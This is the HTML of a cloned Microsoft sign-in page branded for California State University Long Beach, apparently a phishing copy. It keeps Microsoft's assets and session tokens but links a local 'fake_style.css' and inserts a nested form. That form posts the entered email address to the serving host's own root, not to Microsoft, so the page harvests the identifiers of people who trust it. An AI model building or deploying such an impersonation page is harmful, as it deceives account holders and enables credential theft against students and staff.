<head>
    <title>Sign in to your account</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <link rel="preconnect" href="https://aadcdn.msauth.net" crossorigin="">
<meta http-equiv="x-dns-prefetch-control" content="on">
<link rel="dns-prefetch" href="//aadcdn.msauth.net">
<link rel="dns-prefetch" href="//aadcdn.msftauth.net">

    <meta name="PageID" content="ConvergedSignIn">
    <meta name="SiteID" content="">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="en-US">


        <meta name="format-detection" content="telephone=no">

    <noscript>
        <meta http-equiv="Refresh" content="0; URL=https://login.microsoftonline.com/jsdisabled" />
    </noscript>

    
    
<meta name="robots" content="none">

<script type="text/javascript">//<![CDATA[

//]]></script> 



        <link rel="prefetch" href="https://login.live.com/Me.htm?v=3">
        <link rel="shortcut icon" href="https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
        <link rel="stylesheet" href="fake_style.css" />

    <script type="text/javascript">
        ServerData = $Config;
    </script>


    
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css" rel="stylesheet" onerror="$Loader.OnError(this)" onload="$Loader.OnSuccess(this)" integrity="sha384-Zc0p7pM8abcKGtPzWL0oscmmWxZhkOyRDsEZ+5f7A2srGIDp1BgnRxrdZkp9PeR5">



    <script data-loader="cdn" crossorigin="anonymous" src="https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_hMQIa-8TI8qqxRQ695cd-g2.js" onerror="$Loader.OnError(this)" onload="$Loader.OnSuccess(this)"></script>


    <script data-loader="cdn" crossorigin="anonymous" src="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_ywec5xsvivopphf4olex_a2.js" onerror="$Loader.OnError(this)" onload="$Loader.OnSuccess(this)" integrity="sha384-nPJEY0XfmPFijBq3WAybtPDDVNzad54Vvg/PuDs3o+cpu6o8ss5l5aCYN1HTCzXW"></script>

    


<link rel="prefetch" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css"><link rel="prefetch" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_ywec5xsvivopphf4olex_a2.js"><script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_bc2482665b7aae7b068e.js"></script><script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_8dc1586f19519d6b618f.js"></script><script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_ptiles_28a6e310960a3a683ce8.js"></script><script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_d4aa6f34855682e39ee8.js"></script></head>


<body data-bind="defineGlobals: ServerData, bodyCssClass" class="cb" style="display: block;">
    <script type="text/javascript">//<![CDATA[

//]]></script>


<div><!--  -->

<!--  -->

<div data-bind="if: activeDialog"></div>

<form name="f1" id="i0281" novalidate="novalidate" method="post" target="_top" autocomplete="off"  action="/" class="provide-min-height">
    <!-- ko withProperties: { '$loginPage': $data } -->
    <div class="login-paginated-page"><!--  -->

        <div id="lightboxTemplateContainer" data-bind="component: { name: 'lightbox-template', params: { serverData: svr, showHeader: $page.showHeader(), headerLogo: $page.headerLogo() } }, css: { 'provide-min-height': svr.fUseMinHeight }" class="provide-min-height"><!--  -->

<div id="lightboxBackgroundContainer" data-bind="css: { 'provide-min-height': svr.fUseMinHeight },
    component: { name: 'background-image-control',
        publicMethods: $page.backgroundControlMethods,
        event: { load: $page.backgroundImageControl_onLoad } }" class="provide-min-height"><div class="background-image-holder" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">

    <div id="backgroundImage" data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }" class="background-image ext-background-image" style="background-image: url(&quot;https://aadcdn.msauthimages.net/dbd5a2dd-2zw3qm4qynz9c5fstygwvkdcrgzrj-6a-oirg1jenxo/logintenantbranding/0/illustration?ts=638029146188995928&quot;);"></div>
        <!-- ko if: useImageMask -->
        <div data-bind="externalCss: { 'background-overlay': true }" class="background-overlay ext-background-overlay"></div>
        <!-- /ko -->
    <!-- /ko -->
</div></div>

<!-- ko if: svr.iBannerEnvironment --><!-- /ko -->

<!-- ko withProperties: { '$masterPageContext': $parentContext } -->
<div class="outer" data-bind="css: { 'app': $page.backgroundLogoUrl }">
    <!-- ko if: showHeader --><!-- /ko -->

    <div class="template-section main-section">
        <div data-bind="externalCss: { 'middle': true }" class="middle ext-middle">
            <div class="full-height" data-bind="component: { name: 'content-control', params: { serverData: svr, isVerticalSplitTemplate: $page.isVerticalSplitTemplate() } }"><!--  -->

<!-- ko withProperties: { '$content': $data } -->
<div class="flex-column">
    <!-- ko if: $page.paginationControlHelper.showBackgroundLogoHolder --><!-- /ko -->

    <!-- ko if: $page.paginationControlHelper.showPageLevelTitleControl --><!-- /ko -->

    <div class="win-scroll">
        <div id="lightbox" data-bind="
            animationEnd: $page.paginationControlHelper.animationEnd,
            externalCss: { 'sign-in-box': true },
            css: {
                'inner':  $content.isVerticalSplitTemplate,
                'vertical-split-content': $content.isVerticalSplitTemplate,
                'app': $page.backgroundLogoUrl,
                'wide': $page.paginationControlHelper.useWiderWidth,
                'fade-in-lightbox': $page.fadeInLightBox,
                'has-popup': $page.showFedCredAndNewSession &amp;&amp; ($page.showFedCredButtons() || $page.newSession()),
                'transparent-lightbox': $page.backgroundControlMethods() &amp;&amp; $page.backgroundControlMethods().useTransparentLightBox,
                'lightbox-bottom-margin-debug': $page.showDebugDetails }" class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">

            <!-- ko template: { nodes: $masterPageContext.$componentTemplateNodes, data: $page } -->

        <!-- ko if: svr.fShowCookieBanner --><!-- /ko -->

        <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.fAllowGrayOutLightBox &amp;&amp; showLightboxProgress() }"></div>

        <!-- ko if: showLightboxProgress --><!-- /ko -->

        <!-- ko if: loadBannerLogo -->
        <div data-bind="component: { name: 'logo-control',
            params: {
                isChinaDc: svr.fIsChinaDc,
                bannerLogoUrl: bannerLogoUrl() } }"><!--  -->

<!-- ko if: bannerLogoUrl -->
<img id="bannerLogo" role="presentation" data-bind="attr: { src: bannerLogoUrl }, externalCss: { 'banner-logo': true }" src="https://aadcdn.msauthimages.net/dbd5a2dd-2zw3qm4qynz9c5fstygwvkdcrgzrj-6a-oirg1jenxo/logintenantbranding/0/bannerlogo?ts=637515266294315534" class="banner-logo ext-banner-logo">
<!-- /ko -->

<!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- /ko --></div>
        <!-- /ko -->

        <!-- ko if: svr.strLWADisclaimerMsg && paginationControlHelper.showLwaDisclaimer() --><!-- /ko -->

        <!-- ko if: asyncInitReady -->
        <div role="main" data-bind="component: { name: 'pagination-control',
            publicMethods: paginationControlMethods,
            params: {
                enableCssAnimation: svr.fEnableCssAnimation,
                disableAnimationIfAnimationEndUnsupported: svr.fDisableAnimationIfAnimationEndUnsupported,
                initialViewId: initialViewId,
                currentViewId: currentViewId,
                initialSharedData: initialSharedData,
                initialError: $loginPage.getServerError() },
            event: {
                cancel: paginationControl_onCancel,
                load: paginationControlHelper.onLoad,
                unload: paginationControlHelper.onUnload,
                loadView: view_onLoadView,
                showView: view_onShow,
                setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->

<div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class="">
    <!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.sPOST_Username) --><!-- /ko -->

    <div class="pagination-view animate slide-in-next" data-bind="css: {
        'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.sPOST_Username),
        'zero-opacity': hidePaginatedView.hideSubView(),
        'animate': animate(),
        'slide-out-next': animate.isSlideOutNext(),
        'slide-in-next': animate.isSlideInNext(),
        'slide-out-back': animate.isSlideOutBack(),
        'slide-in-back': animate.isSlideInBack() }">

        <!-- ko foreach: views -->
            <!-- ko if: $parent.currentViewIndex() === $index() -->
                <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="1" data-showfedcredbutton="true" data-bind="pageViewComponent: { name: 'login-paginated-username-view',
                params: {
                    serverData: svr,
                    serverError: initialError,
                    isInitialView: isInitialState,
                    displayName: sharedData.displayName,
                    otherIdpRedirectUrl: sharedData.otherIdpRedirectUrl,
                    prefillNames: $loginPage.prefillNames,
                    flowToken: sharedData.flowToken,
                    availableSignupCreds: sharedData.availableSignupCreds },
                event: {
                    redirect: $loginPage.view_onRedirect,
                    setPendingRequest: $loginPage.view_onSetPendingRequest,
                    registerDialog: $loginPage.view_onRegisterDialog,
                    unregisterDialog: $loginPage.view_onUnregisterDialog,
                    showDialog: $loginPage.view_onShowDialog,
                    updateAvailableCredsWithoutUsername: $loginPage.view_onUpdateAvailableCreds,
                    agreementClick: $loginPage.footer_agreementClick } }"><!--  -->

<div data-bind="component: { name: 'header-control',
    params: {
        serverData: svr,
        title: str['WF_STR_HeaderDefault_Title'] } }"><div>
    <div class="row title ext-title" id="loginHeader" data-bind="externalCss: { 'title': true }">
        <div role="heading" aria-level="1" data-bind="text: title">Sign in</div>
        <!-- ko if: isSubtitleVisible --><!-- /ko -->
    </div>

    <!-- ko if: headerDescription --><!-- /ko -->
</div></div>

<!-- ko if: pageDescription && !svr.fHideLoginDesc --><!-- /ko -->

<div class="row">
    <div role="alert" aria-live="assertive">
        <!-- ko if: usernameTextbox.error --><!-- /ko -->
    </div>

    <div class="form-group col-md-24">
        <!-- ko if: prefillNames().length > 1 --><!-- /ko -->

        <!-- ko ifnot: prefillNames().length > 1 -->
        <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
            publicMethods: usernameTextbox.placeholderTextboxMethods,
            params: {
                serverData: svr,
                hintText: tenantBranding.unsafe_userIdLabel || str['STR_SSSU_Username_Hint'] || str['CT_PWD_STR_Email_Example'],
                hintCss: 'placeholder' + (!svr.fAllowPhoneSignIn ? ' ltr_override' : '') },
            event: {
                updateFocus: usernameTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } -->
    <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } -->
            <form action="/" method="POST">
            <input name="email" type="email" name="loginfmt" id="i0116" maxlength="113" class="form-control ltr_override input ext-input text-box ext-text-box" 
                    placeholder="Email, phone, or Skype">

        <!-- /ko -->
<!-- /ko -->
<!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div>
        <!-- /ko -->
    </div>
</div>

<div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }, externalCss: { 'password-reset-links-container': true }" class="password-reset-links-container ext-password-reset-links-container">
    <div class="row">
        <div class="col-md-24">
            <div class="text-13">
                <!-- ko if: svr.fCBShowSignUp && !svr.fDoIfExists && !svr.fCheckProofForAliases -->
                <!-- ko if: svr.fIsSelfServiceSignupUxEnabled --><!-- /ko -->
                
                <!-- ko ifnot: svr.fIsSelfServiceSignupUxEnabled -->
                <div class="form-group" data-bind="
                    htmlWithBindings: html['WF_STR_SignUpLink_Text'],
                    childBindings: {
                        'signup': {
                            href: svr.urlSignUp || '#',
                            ariaLabel: svr.urlSignUp ? str['WF_STR_SignupLink_AriaLabel_Text'] : str['WF_STR_SignupLink_AriaLabel_Generic_Text'],
                            click: signup_onClick } }">No account? <a href="https://login.live.com/oauth20_authorize.srf?client_id=2793995e-0a7d-40d7-bd35-6968ba142197&amp;scope=openid+profile+offline_access+email&amp;redirect_uri=https%3a%2f%2fmyapps.microsoft.com%2f&amp;response_type=code&amp;state=eyJpZCI6ImRiOWQ2ZGJiLWNjMmQtNDEyYi04OWUwLWExZGJhMDdmMjY4MCIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3d&amp;response_mode=fragment&amp;nonce=b2ab5188-5dc4-42e3-8c23-4f51a2924f16&amp;code_challenge=jLEpd2oiqe3zfKZNmKm4pp54zVc-Kfp0Sosf9oqfL7s&amp;code_challenge_method=S256&amp;x-client-SKU=msal.js.browser&amp;x-client-Ver=2.28.1&amp;uaid=8335b03d20ca4de8b135c08e03624819&amp;msproxy=1&amp;issuer=mso&amp;tenant=common&amp;ui_locales=en-US&amp;client_info=1&amp;signup=1&amp;lw=1&amp;fl=easi2&amp;epct=AQABAAAAAAD--DLA3VO7QrddgJg7WevrNu3mTwXr3KhHMTIdp_XMea7i52JfxKsPEchj0iJcnorqA5Yt8dZE68KxbOGZmH6E67j2zhmN4FZvm8sxPkmHzo2-cTK74iqVEXKTo71FsfYsXmeUxq5zoLr0Ha4u1TT5kvCbOO8_RnRb6gOlyNs9xgvkouEat6WS9L9EWiFRrxxNI4_EhpsU6n6lZJb-FLg9eVknj1gHAluUc60AExTthiAA&amp;jshs=0" id="signup" aria-label="Create a Microsoft account">Create one!</a></div>
                <!-- /ko -->
                <!-- /ko -->

                <!-- ko ifnot: hideCantAccessYourAccount -->
                <div class="form-group">
                    <a id="cantAccessAccount" name="cannotAccessAccount" data-bind="
                        text: unsafe_cantAccessYourAccountText,
                        click: accessRecoveryLink ? null : cantAccessAccount_onClick,
                        attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                        href: accessRecoveryLink || '#'" target="" href="#">Can’t access your account?</a>
                </div>
                <!-- /ko -->

                <!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.fShowForgotUsernameLink || isOfflineAccountVisible) --><!-- /ko -->

                <!-- ko if: showCredPicker --><!-- /ko -->

                <!-- ko if: svr.urlSkipZtd --><!-- /ko -->
            </div>
        </div>
    </div>
</div>

<!-- ko if: svr.fShowLegalMessagingInline --><!-- /ko -->

<div class="win-button-pin-bottom boilerplate-button-bottom" data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText }">
    <div class="row move-buttons" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
        <div data-bind="component: { name: 'footer-buttons-field',
            params: {
                serverData: svr,
                isPrimaryButtonEnabled: !isRequestPending(),
                isPrimaryButtonVisible: svr.fShowButtons,
                isSecondaryButtonEnabled: true,
                isSecondaryButtonVisible: svr.fShowButtons &amp;&amp; isSecondaryButtonVisible(),
                secondaryButtonText: secondaryButtonText() },
            event: {
                primaryButtonClick: primaryButton_onClick,
                secondaryButtonClick: secondaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container" data-bind="
    visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
    css: { 'no-margin-bottom': removeBottomMargin },
    externalCss: { 'button-field-container': true }">


    <div data-bind="css: { 'inline-block': true }, externalCss: { 'button-item': true }" class="inline-block button-item ext-button-item">
        <input type="button" id="idBtn_Back" class="win-button button-secondary button ext-button secondary ext-secondary" value="Back">
    </div>

    <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }, externalCss: { 'button-item': true }" class="inline-block button-item ext-button-item">
        <!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
        <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" value="Next">
            </form>
    </div>
</div></div>
    </div>
</div>

<!-- ko if: tenantBranding.BoilerPlateText -->
<div id="idBoilerPlateText" class="wrap-content boilerplate-text ext-boilerplate-text" data-bind="
    htmlWithMods: tenantBranding.BoilerPlateText,
    htmlMods: { filterLinks: svr.fIsHosted },
    css: { 'transparent-lightbox': tenantBranding.UseTransparentLightBox },
    externalCss: { 'boilerplate-text': true }"><p>For questions or assistance, please contact the <a href="https://helpdesk.csulb.edu/" rel="noopener noreferrer" target="_blank">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.</p>
</div>
<!-- /ko --></div><!-- /ko -->
 
    </div>
</div></div>
        <!-- /ko -->

        <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value="">
        <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value="">
        <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value="">
        <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value="">
        <input type="hidden" name="canary" data-bind="value: svr.canary" value="0ehd+6k3ql7XoWm5I+Hm/OUbvNwcLPTvi2rOayeBzA4=2:1">
        <input type="hidden" name="ctx" data-bind="value: ctx" value="rQQIARAAfZG9axNhAIfvzaUxDdQGBanQQsAireEud-_dJblAh36E5jum2uZjkft4z7zpvXmv9yaNCTi5OEnBRToKLllMndSpcxa7Kf4FoijiYhfB-A-4_JZnep5fJARFmBblOzwUpcwqTOmKrmtIkIyULaiSnRJMW9GEpJ5Mm4asQllP-dci0Y2J9mQa-1I-086f8Wbu5imYt1jfNUVk98dgpd3reSyTSJCh4XlMJNjyKaNOT7QoSbwF4AKAcWDVhIapyem0oNmWKqgQKULagoqgOppsQB2qjpz8HFisbvZ7bfhvqI9H6Fcg7PjGQ4K6vVPeQ8OC19rOJ_NkD1frNdjaLeBSvdIpk1qvspMdNrGkVuv7g1I9-2jG2uUdm5Q7TbW8nWd5Irv2bhZXuwwbdU1qNQrtprLnmVDbR40tN9-h2CIHh0aj4DaVGnYa0sYbPjRzILQ75W9RD3WxHfN86mAXxajjuLiLHhiWhRiLIWJg9xMPLoLga_BGOBBdXgIxbu22xGfC4UiUW-Ji3GUQvJyb5Vz_8-7xh4P17POVH2vrywvcdC4hobYdTx4qR26qQetEy8dzJFHdN48rA6t09_4xhn7VGKKt0aa6ATPySQichK5PQ4uEGa7YYaLp0wFD_s8QeHqFez___0teRMA4Eu-Usp4NKT5CysgptiqkSFTP09TRgSUUHU-6R5mj0yOnlGKTCDhf4C6vTj6-_vbq99n33F81">
        <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value="7db9fd29-56cf-4529-931d-ee28291c0d00">
        <input type="hidden" id="i0327" data-bind="attr: { name: svr.sFTName }, value: flowToken" name="flowToken" value="AQABAAEAAAD--DLA3VO7QrddgJg7Wevr2cBDmJXRU2ZxbqasAuoshlUB5SvpqQ1M9D7dD5gGFe8FSIMkV8HFQIIQQED57YagsOX3ohA_bwv72mtmS9PISzWTUpPhU1SUakf-sprnvKqMsz9kpO3aFJUQFGKpggiycB2RoLTVIrmMZ-9Mi56oCvINuL5Q6sDWW11fk7pPnUlzfxuZiGG2RiIvK8muQHFWPPVX3cSVCsrXVcfF0nWZSbh0CyULek-FaS5v530ZksWWCHr7J77yyqhOj1Wjj_YOlU6-aYRNxsF2vYig87gWbyajf5ESkkIpUb_GLDAZfErcNO8cqjjsQMX8TPAzHNlnd0-jP-Vw0W3NgxKa4Jx_Got1H7IEFG09-pmmQzIH98Q_9ez92zBrgpNjw_F803oTimswcp1eJkgRr2x247fPQvUNqEtgSdE1AmgeK75D-dmz-qsp_RKwGrctgzL3PI-AozIKxt8dHpKOpJ7n8A7bjaQfIt2Vc-4lT1PWi2cJ3cWeo_-GHnFfseT1i2JXZRUV_8I7TgMhizRG9AXV6jUQiBQzHDXg_MOiMA97NyCNyrkgAA">
        <input type="hidden" name="PPSX" data-bind="value: svr.sRandomBlob" value="">
        <input type="hidden" name="NewUser" value="1">
        <input type="hidden" name="FoundMSAs" data-bind="value: svr.sFoundMSAs" value="">
        <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0">
        <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0">
        <input type="hidden" name="CookieDisclosure" data-bind="value: svr.fShowCookieBanner ? 1 : 0" value="0">
        <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="1">
        <input type="hidden" name="isSignupPost" data-bind="value: isSignupPost() ? 1 : 0" value="0">
        <input type="hidden" name="isRecoveryAttemptPost" data-bind="value: isRecoveryAttemptPost() ? 1 : 0" value="0">
        <div data-bind="component: { name: 'instrumentation-control',
            publicMethods: instrumentationMethods,
            params: { serverData: svr } }">
<input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>
    <!-- /ko -->
        </div>

        <!-- ko if: $page.showFedCredAndNewSession -->
        <!-- ko if: $page.showFedCredButtons -->
        <div data-bind="css: { 'app': $page.backgroundLogoUrl }, externalCss: { 'promoted-fed-cred-box': true }" class="promoted-fed-cred-box ext-promoted-fed-cred-box">
            <div class="promoted-fed-cred-content" data-bind="css: {
                'animate': $page.useCssAnimations &amp;&amp; $page.animate(),
                'slide-out-next': $page.animate.isSlideOutNext,
                'slide-in-next': $page.animate.isSlideInNext,
                'slide-out-back': $page.animate.isSlideOutBack,
                'slide-in-back': $page.animate.isSlideInBack,
                'app': $page.backgroundLogoUrl }">

                <!-- ko foreach: $page.otherSigninOptions -->
                <div class="row tile">
                    <div class="table" role="button" tabindex="0" data-bind="
                        css: { 'list-item': svr.fSupportWindowsStyles },
                        pressEnter: $page.otherSigninOptionsButton_onClick,
                        click: $page.otherSigninOptionsButton_onClick,
                        ariaLabel: $data.text" aria-label="Sign-in options">

                        <div class="table-row">
                            <div class="table-cell tile-img medium">
                                <!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko -->
<!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
<!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="tile-img medium" role="presentation" data-bind="attr: { src: $data.darkIconUrl }" src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg"><!-- /ko -->
<!-- /ko --><!-- /ko -->
                            </div>
                            <div class="table-cell text-left content" data-bind="css: { 'content': !svr.fSupportWindowsStyles }">
                                <div data-bind="
                                    text: $data.text,
                                    attr: { 'data-test-id': $data.testId }" data-test-id="signinOptions">Sign-in options</div>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- /ko -->
            </div>
        </div>
        <!-- /ko -->

        <!-- ko if: $page.newSession --><!-- /ko -->
        <!-- /ko -->

        <!-- ko if: $page.showDebugDetails --><!-- /ko -->
    </div>
</div>
<!-- /ko --></div>
        </div>
    </div>

    <!-- ko if: $page.paginationControlHelper.showFooterControl -->
    <div id="footer" role="contentinfo" data-bind="
        externalCss: {
            'footer': true,
            'has-background': !$page.useDefaultBackground() &amp;&amp; $page.showFooter(),
            'background-always-visible': $page.backgroundLogoUrl }" class="footer ext-footer has-background ext-has-background">

        <div data-bind="component: { name: 'footer-control',
            publicMethods: $page.footerMethods,
            params: {
                serverData: svr,
                useDefaultBackground: $page.useDefaultBackground(),
                hasDarkBackground: $page.backgroundLogoUrl(),
                showLinks: true,
                showFooter: $page.showFooter(),
                hideTOU: $page.hideTOU(),
                termsText: $page.termsText(),
                termsLink: $page.termsLink(),
                hidePrivacy: $page.hidePrivacy(),
                privacyText: $page.privacyText(),
                privacyLink: $page.privacyLink() },
            event: {
                agreementClick: $page.footer_agreementClick,
                showDebugDetails: $page.toggleDebugDetails_onClick } }"><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
<div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links" data-bind="externalCss: { 'footer-links': true }">

    <!-- ko if: showFooter -->
        <!-- ko if: !hideTOU -->
        <a id="ftrTerms" data-bind="
            text: termsText,
            href: termsLink,
            click: termsLink_onClick,
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }" href="https://www.microsoft.com/en-US/servicesagreement/" class="footer-content ext-footer-content footer-item ext-footer-item has-background ext-has-background">Terms of use</a>
        <!-- /ko -->

        <!-- ko if: !hidePrivacy -->
        <a id="ftrPrivacy" data-bind="
            text: privacyText,
            href: privacyLink,
            click: privacyLink_onClick,
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }" href="https://privacy.microsoft.com/en-US/privacystatement" class="footer-content ext-footer-content footer-item ext-footer-item has-background ext-has-background">Privacy &amp; cookies</a>
        <!-- /ko -->

        <!-- ko if: impressumLink --><!-- /ko -->

        <!-- ko if: a11yConformeLink --><!-- /ko -->

        <!-- ko if: showIcpLicense --><!-- /ko -->
    <!-- /ko -->

    <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
    <a id="moreOptions" href="#" role="button" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item has-background ext-has-background">...</a>
</div>
<!-- /ko -->

<!-- ko if: svr.fShowLegalMessagingInline && showLinks --><!-- /ko --></div>
    </div>
    <!-- /ko -->
</div>
<!-- /ko --></div>
        <!-- /ko -->

        <!-- ko if: isVerticalSplitTemplate() && isTemplateLoaded() --><!-- /ko -->
    <!-- /ko -->
<!-- /ko --></div>
    <!-- /ko -->
</form>

<form data-bind="postRedirectForm: postRedirect" method="POST" aria-hidden="true" target="_top"></form>

<!-- ko if: svr.urlCBPartnerPreload --><!-- /ko -->

<!-- ko if: svr.urlDeviceFingerprinting --><!-- /ko --></div></body>